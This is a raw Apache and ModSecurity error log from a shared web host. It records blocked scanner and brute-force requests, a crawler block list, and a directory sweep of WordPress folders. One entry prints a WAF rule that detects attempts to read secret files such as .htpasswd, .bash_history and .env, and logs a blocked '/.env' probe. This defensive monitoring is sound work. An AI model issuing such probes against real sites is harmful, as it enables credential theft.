[Tue May 26 13:33:11.111306 2026] [security2:error] [pid 512344:tid 512483] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTvsbElyei4S77DQcQRgAAAAk"]
[Tue May 26 13:33:11.554403 2026] [security2:error] [pid 512344:tid 512513] [client 165.140.119.146:60940] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVTv8bElyei4S77DQcQVgAAACc"], referer: https://www.bloggertarget.com
[Tue May 26 13:33:11.554559 2026] [security2:error] [pid 512344:tid 512513] [client 165.140.119.146:60940] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahVTv8bElyei4S77DQcQVgAAACc"], referer: https://www.bloggertarget.com
[Tue May 26 13:33:11.585675 2026] [security2:error] [pid 512745:tid 512792] [remote 123.30.233.13:54306] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.233.30.123.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahVTv3KSB_s2CvZg7xN9LQABhy4"]
[Tue May 26 13:33:12.185585 2026] [security2:error] [pid 512344:tid 512600] [client 176.65.139.237:21556] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.alphaelectronics.svijaykumar.in"] [uri "/.env"] [unique_id "ahVTwMbElyei4S77DQcQXwAAAH4"]
[Tue May 26 13:33:13.400535 2026] [security2:error] [pid 512745:tid 512881] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTwHKSB_s2CvZg7xN9SAAAARA"]
[Tue May 26 13:33:13.413412 2026] [security2:error] [pid 512745:tid 512980] [client 4.228.83.111:35054] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 111.83.228.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpanel.aastha-enterprises.com"] [uri "/vv.php"] [unique_id "ahVTwXKSB_s2CvZg7xN9TwAAAXM"]
[Tue May 26 13:33:13.413574 2026] [security2:error] [pid 512745:tid 512980] [client 4.228.83.111:35054] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "cpanel.aastha-enterprises.com"] [uri "/vv.php"] [unique_id "ahVTwXKSB_s2CvZg7xN9TwAAAXM"]
[Tue May 26 13:33:13.789108 2026] [security2:error] [pid 512344:tid 512547] [client 103.160.27.20:57149] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.27.160.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kmmc.co.in"] [uri "/xmlrpc.php"] [unique_id "ahVTwcbElyei4S77DQcQcAAAAEk"]
[Tue May 26 13:33:13.789275 2026] [security2:error] [pid 512344:tid 512547] [client 103.160.27.20:57149] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kmmc.co.in"] [uri "/xmlrpc.php"] [unique_id "ahVTwcbElyei4S77DQcQcAAAAEk"]
[Tue May 26 13:33:13.820648 2026] [security2:error] [pid 512745:tid 512996] [client 103.160.27.20:57150] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 20.27.160.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kmmc.co.in"] [uri "/xmlrpc.php"] [unique_id "ahVTwXKSB_s2CvZg7xN9VgAAAYM"]
[Tue May 26 13:33:13.820777 2026] [security2:error] [pid 512745:tid 512996] [client 103.160.27.20:57150] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kmmc.co.in"] [uri "/xmlrpc.php"] [unique_id "ahVTwXKSB_s2CvZg7xN9VgAAAYM"]
[Tue May 26 13:33:15.616559 2026] [security2:error] [pid 512344:tid 512511] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTw8bElyei4S77DQcQkgAAACU"]
[Tue May 26 13:33:16.081600 2026] [security2:error] [pid 512344:tid 512538] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTxMbElyei4S77DQcQoQAAAEA"], referer: https://www.anujtradingco.com/
[Tue May 26 13:33:17.392764 2026] [security2:error] [pid 512745:tid 512937] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTxHKSB_s2CvZg7xN9jAAAAUg"]
[Tue May 26 13:33:18.047514 2026] [security2:error] [pid 512745:tid 512894] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTxXKSB_s2CvZg7xN9mgAAAR0"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1235007&moderation-hash=562a867a51a18e9f1eeb401257b769a8
[Tue May 26 13:33:19.869142 2026] [security2:error] [pid 512745:tid 512843] [remote 74.7.241.58:50140] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVTx3KSB_s2CvZg7xN9twABX2E"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes/SimplePie/Cache
[Tue May 26 13:33:20.098156 2026] [security2:error] [pid 512344:tid 512562] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTx8bElyei4S77DQcQ1wAAAFg"]
[Tue May 26 13:33:21.687474 2026] [security2:error] [pid 512344:tid 512505] [client 43.173.180.187:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVTyMbElyei4S77DQcQ3wAAAB8"]
[Tue May 26 13:33:21.818920 2026] [security2:error] [pid 512745:tid 512963] [client 167.160.68.207:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVTyXKSB_s2CvZg7xN90QAAAWI"], referer: https://anujtradingco.com
[Tue May 26 13:33:22.794736 2026] [security2:error] [pid 512344:tid 512545] [client 114.119.149.203:61363] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/robots.txt"] [unique_id "ahVTysbElyei4S77DQcQ-QAAAEc"]
[Tue May 26 13:33:23.972273 2026] [security2:error] [pid 512745:tid 512897] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTy3KSB_s2CvZg7xN98AAAASA"]
[Tue May 26 13:33:25.887752 2026] [autoindex:error] [pid 512745:tid 512952] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-content/uploads/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:25.888506 2026] [security2:error] [pid 512745:tid 512952] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTzXKSB_s2CvZg7xN-FgAAAVc"]
[Tue May 26 13:33:26.102638 2026] [autoindex:error] [pid 512745:tid 512882] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:26.103310 2026] [security2:error] [pid 512745:tid 512882] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTznKSB_s2CvZg7xN-GgAAARE"]
[Tue May 26 13:33:26.303894 2026] [autoindex:error] [pid 512745:tid 513001] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:26.304545 2026] [security2:error] [pid 512745:tid 513001] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTznKSB_s2CvZg7xN-HgAAAYg"]
[Tue May 26 13:33:26.328673 2026] [security2:error] [pid 512344:tid 512599] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVTzcbElyei4S77DQcRIwAAAH0"]
[Tue May 26 13:33:26.506951 2026] [autoindex:error] [pid 512745:tid 513002] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:26.507591 2026] [security2:error] [pid 512745:tid 513002] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTznKSB_s2CvZg7xN-JQAAAYk"]
[Tue May 26 13:33:26.697656 2026] [autoindex:error] [pid 512745:tid 512967] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:26.698340 2026] [security2:error] [pid 512745:tid 512967] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTznKSB_s2CvZg7xN-JgAAAWY"]
[Tue May 26 13:33:26.910730 2026] [autoindex:error] [pid 512745:tid 512934] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:26.911374 2026] [security2:error] [pid 512745:tid 512934] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTznKSB_s2CvZg7xN-KAAAAUU"]
[Tue May 26 13:33:27.130711 2026] [autoindex:error] [pid 512745:tid 512889] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:27.131659 2026] [security2:error] [pid 512745:tid 512889] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTz3KSB_s2CvZg7xN-LgAAARg"]
[Tue May 26 13:33:27.311799 2026] [autoindex:error] [pid 512745:tid 512981] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/Text/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:27.312441 2026] [security2:error] [pid 512745:tid 512981] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVTz3KSB_s2CvZg7xN-NwAAAXQ"]
[Tue May 26 13:33:27.492845 2026] [security2:error] [pid 512745:tid 512892] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVTz3KSB_s2CvZg7xN-OwAAARs"]
[Tue May 26 13:33:27.692657 2026] [security2:error] [pid 512745:tid 512912] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVTz3KSB_s2CvZg7xN-QQAAAS8"]
[Tue May 26 13:33:27.889292 2026] [security2:error] [pid 512745:tid 512910] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVTz3KSB_s2CvZg7xN-RAAAAS0"]
[Tue May 26 13:33:28.118235 2026] [autoindex:error] [pid 512745:tid 512891] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-content/mu-plugins/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:28.118968 2026] [security2:error] [pid 512745:tid 512891] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0HKSB_s2CvZg7xN-TgAAARo"]
[Tue May 26 13:33:28.130071 2026] [security2:error] [pid 512745:tid 512938] [client 85.208.96.210:54512] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVT0HKSB_s2CvZg7xN-TwAAAUk"]
[Tue May 26 13:33:28.130238 2026] [security2:error] [pid 512745:tid 512938] [client 85.208.96.210:54512] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/category/no-school-kids-care/list/"] [unique_id "ahVT0HKSB_s2CvZg7xN-TwAAAUk"]
[Tue May 26 13:33:28.310731 2026] [autoindex:error] [pid 512745:tid 512898] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:28.311350 2026] [security2:error] [pid 512745:tid 512898] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0HKSB_s2CvZg7xN-UAAAASE"]
[Tue May 26 13:33:28.953194 2026] [security2:error] [pid 512745:tid 512901] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT0HKSB_s2CvZg7xN-XAAAASQ"]
[Tue May 26 13:33:29.014679 2026] [security2:error] [pid 512745:tid 512980] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "cicodev.org"] [uri "/wp-includes/blocks/index.php"] [unique_id "ahVT0HKSB_s2CvZg7xN-WQAAAXM"]
[Tue May 26 13:33:29.427281 2026] [autoindex:error] [pid 512745:tid 512944] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:29.427894 2026] [security2:error] [pid 512745:tid 512944] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0XKSB_s2CvZg7xN-bQAAAU8"]
[Tue May 26 13:33:29.625885 2026] [autoindex:error] [pid 512745:tid 512925] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/customize/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:29.626717 2026] [security2:error] [pid 512745:tid 512925] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0XKSB_s2CvZg7xN-bwAAATw"]
[Tue May 26 13:33:29.805964 2026] [autoindex:error] [pid 512745:tid 512998] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:29.806741 2026] [security2:error] [pid 512745:tid 512998] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0XKSB_s2CvZg7xN-cAAAAYU"]
[Tue May 26 13:33:30.012236 2026] [autoindex:error] [pid 512745:tid 512954] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/wp-includes/images/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:30.012877 2026] [security2:error] [pid 512745:tid 512954] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0XKSB_s2CvZg7xN-dwAAAVk"]
[Tue May 26 13:33:30.215101 2026] [autoindex:error] [pid 512745:tid 512959] [client 185.104.184.206:48598] AH01276: Cannot serve directory /home1/cicode9a/public_html/.well-known/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:33:30.215721 2026] [security2:error] [pid 512745:tid 512959] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "cicodev.org"] [uri "/cgi-sys/403.html"] [unique_id "ahVT0nKSB_s2CvZg7xN-egAAAV4"]
[Tue May 26 13:33:30.396164 2026] [security2:error] [pid 512745:tid 512953] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT0nKSB_s2CvZg7xN-fgAAAVg"]
[Tue May 26 13:33:30.608486 2026] [security2:error] [pid 512745:tid 512912] [client 185.104.184.206:48598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "cicodev.org"] [uri "/cgi-sys/404.html"] [unique_id "ahVT0nKSB_s2CvZg7xN-iAAAAS8"]
[Tue May 26 13:33:30.639360 2026] [security2:error] [pid 512745:tid 512897] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT0nKSB_s2CvZg7xN-eQAAASA"]
